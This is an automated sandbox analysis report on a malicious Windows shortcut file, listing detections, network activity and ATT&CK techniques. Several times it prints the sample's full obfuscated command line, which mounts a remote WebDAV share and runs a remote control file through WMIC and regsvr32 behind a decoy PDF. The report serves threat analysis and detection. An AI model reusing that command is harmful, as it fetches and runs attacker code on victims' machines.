Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
daHTg2LQmU.lnk

Overview

General Information

Sample name:daHTg2LQmU.lnk
renamed because original name is a hash value
Original sample name:26a989ca3cc6222e3980b874a247112e.lnk
Analysis ID:1581576
MD5:26a989ca3cc6222e3980b874a247112e
SHA1:df7f39d5e475ed6d61055d4a8160b9b6c5348dfa
SHA256:44aa68bbf2c5d018346fdfc21ba1d419f80921c8436778e4baeafbfb40aa6eeb
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Gathers information about network shares
Machine Learning detection for sample
Obfuscated command line found
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6680 cmdline: "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • net.exe (PID: 6872 cmdline: net use \\finatick.com@8080\docs\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 65.20.104.212, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 6872, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
Source: Process startedAuthor: frack113: Data: Command: net use \\finatick.com@8080\docs\, CommandLine: net use \\finatick.com@8080\docs\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\finatick.com@8080\docs\, ProcessId: 6872, ProcessName: net.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\finatick.com@8080\docs\, CommandLine: net use \\finatick.com@8080\docs\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\finatick.com@8080\docs\, ProcessId: 6872, ProcessName: net.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-28T09:29:44.833701+010018100051Potentially Bad Traffic192.168.2.44973165.20.104.2128080TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: daHTg2LQmU.lnkVirustotal: Detection: 8%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
Source: daHTg2LQmU.lnkJoe Sandbox ML: detected

Networking

barindex
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 65.20.104.212:8080
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 65.20.104.212:8080
Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: finatick.com
Source: net.exe, 00000002.00000002.2108829925.0000029FE5837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://finatick.com:8080/
Source: classification engineClassification label: mal80.spyw.winLNK@4/0@1/1
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\net.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: daHTg2LQmU.lnkVirustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\finatick.com@8080\docs\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\finatick.com@8080\docs\Jump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf "

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\net.exe TID: 6920Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: net.exe, 00000002.00000002.2109621388.0000029FE5898000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000002.00000003.2106337484.0000029FE5898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: net.exe, 00000002.00000002.2108829925.0000029FE5837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\finatick.com@8080\docs\Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c "set rqxjd6fw=s^e&& !rqxjd6fw!t "mcyt=3" &&!rqxjd6fw!t "efzo=8" &&!rqxjd6fw!t "ftza=t" &&!rqxjd6fw!t "ttzp=i" &&!rqxjd6fw!t "chtu=m" &&!rqxjd6fw!t "hgqk=s" &&!rqxjd6fw!t "rluf=a" &&!rqxjd6fw!t "xbyz=l" &&!rqxjd6fw!t "fcfq=v" &&!rqxjd6fw!t "yejz=e" &&!rqxjd6fw!t "xrnc=o" &&!rqxjd6fw!t "mqis=c" &&!rqxjd6fw!t "ormz=r" &&!rqxjd6fw!t "g4jhjxg1=\\fina!ftza!!ttzp!ck.co!chtu!@!efzo!080\doc!hgqk!\" && c!rluf!!xbyz!l !rqxjd6fw!t "ze7pw47m=acti!fcfq!!yejz!p!xrnc!d.o!mqis!x" && net us!yejz! !g4jhjxg1! && wm!ttzp!!mqis! proc!yejz!!hgqk!s c!rluf!l!xbyz! c!ormz!e!rluf!!ftza!!yejz! "!ormz!!yejz!gs!fcfq!!ormz!!mcyt!2 /!hgqk! /i !g4jhjxg1!!ze7pw47m!" && st!rluf!r!ftza! !g4jhjxg1!crypto.pdf "

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\finatick.com@8080\docs\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\finatick.com@8080\docs\Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.